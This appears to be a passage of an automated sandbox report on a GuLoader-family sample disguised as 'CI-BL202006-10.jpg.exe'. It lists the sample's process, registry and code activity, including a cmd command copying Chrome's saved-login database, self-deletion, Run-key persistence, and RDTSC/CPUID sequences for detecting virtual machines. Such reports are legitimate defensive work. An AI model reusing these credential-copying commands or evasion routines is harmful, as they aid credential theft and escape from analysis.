      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\CI-BL202006-10.jpg.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeProcess created: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe 'C:\Users\user\Desktop\CI-BL202006-10.jpg.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\CI-BL202006-10.jpg.exe'Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /VJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000008.00000000.992743671.000000000B830000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: CI-BL202006-10.jpg.exe, 00000007.00000002.1019042101.000000001F3F0000.00000040.00000001.sdmp, svchost.exe, 00000009.00000003.1015482799.0000000002C00000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdb source: CI-BL202006-10.jpg.exe, svchost.exe
      Source: Binary string: svchost.pdb source: CI-BL202006-10.jpg.exe
      Source: Binary string: svchost.pdbUGP source: CI-BL202006-10.jpg.exe, 00000007.00000003.1014584683.0000000000936000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000008.00000000.992743671.000000000B830000.00000002.00000001.sdmp

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 00000007.00000002.1015572977.0000000000560000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: CI-BL202006-10.jpg.exe PID: 5948, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: CI-BL202006-10.jpg.exe PID: 3608, type: MEMORY
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_00403C53 push ebx; iretd 0_2_00403C60
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_00401E39 push FFFFFFF2h; retf 0_2_00401E44
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_00402CED push 8FB1657Fh; retf 0_2_00402CF5
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_004060F9 push ebx; iretd 0_2_004060FC
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_00404F43 push ebx; iretd 0_2_00404F9C
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_00404F43 push ebx; iretd 0_2_00405008
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_0040435B push ebx; iretd 0_2_0040435C
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_00402364 push ebx; ret 0_2_0040236E
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_00404367 push es; ret 0_2_004043E3
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_00405125 push esp; iretd 0_2_0040512D
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_00404FC8 push ebx; iretd 0_2_00405008
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_004043E4 push es; ret 0_2_004043FB
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_004049EF push ebx; iretd 0_2_004049F0
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_00402986 push esi; retf 0_2_00402987
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_00404395 push es; ret 0_2_004043E3
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_004025BF push edi; retf 0_2_004025C9
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_3_0093C7BD push 8BFFFFF7h; retf 7_3_0093C7C2
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F46DE2D push ecx; ret 7_2_1F46DE40
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_0009C178 push cs; ret 7_2_0009C179
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_0009520B push ecx; ret 7_2_0009520C
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_0009B40D push cs; ret 7_2_0009B40E
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_0009A575 push eax; ret 7_2_0009A5C8
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_0009A5CB push eax; ret 7_2_0009A632
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_0009A5C2 push eax; ret 7_2_0009A5C8
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_0009A62C push eax; ret 7_2_0009A632
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_0009AF53 push ebp; ret 7_2_0009AF54
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0307DE2D push ecx; ret 9_2_0307DE40
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0281520B push ecx; ret 9_2_0281520C
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0281C178 push cs; ret 9_2_0281C179
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0281A62C push eax; ret 9_2_0281A632
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0281AF53 push ebp; ret 9_2_0281AF54

      Source: C:\Windows\SysWOW64\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run GLFXGZA0QZJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run GLFXGZA0QZJump to behavior

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Uses an obfuscated file name to hide its real file extension (double extension)Show sources
      Source: Possible double extension: jpg.exeStatic PE information: CI-BL202006-10.jpg.exe
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_001C252F 0_2_001C252F
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_0056252F 7_2_0056252F
      Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_7-42367
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeRDTSC instruction interceptor: First address: 00000000001C2532 second address: 00000000001C2551 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a mov esi, edx 0x0000000c pushad 0x0000000d mov eax, 00000001h 0x00000012 cpuid 0x00000014 bt ecx, 1Fh 0x00000018 jc 00007F0AE4B0FF93h 0x0000001a cld 0x0000001b popad 0x0000001c lfence 0x0000001f rdtsc
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeRDTSC instruction interceptor: First address: 00000000001C2551 second address: 00000000001C2532 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a sub edx, esi 0x0000000c cmp edx, 00000000h 0x0000000f jle 00007F0AE4C56E0Fh 0x00000011 lfence 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeRDTSC instruction interceptor: First address: 0000000000562532 second address: 0000000000562551 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a mov esi, edx 0x0000000c pushad 0x0000000d mov eax, 00000001h 0x00000012 cpuid 0x00000014 bt ecx, 1Fh 0x00000018 jc 00007F0AE4B0FF93h 0x0000001a cld 0x0000001b popad 0x0000001c lfence 0x0000001f rdtsc
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeRDTSC instruction interceptor: First address: 0000000000562551 second address: 0000000000562532 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a sub edx, esi 0x0000000c cmp edx, 00000000h 0x0000000f jle 00007F0AE4C56E0Fh 0x00000011 ret 0x00000012 pop ecx 0x00000013 cmp edx, 32h 0x00000016 jl 00007F0AE4C56E36h 0x00000018 push ecx 0x00000019 call 00007F0AE4C56E63h 0x0000001e lfence 0x00000021 rdtsc
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeRDTSC instruction interceptor: First address: 0000000000408354 second address: 000000000040835A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeRDTSC instruction interceptor: First address: 00000000004086EE second address: 00000000004086F4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002808354 second address: 000000000280835A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\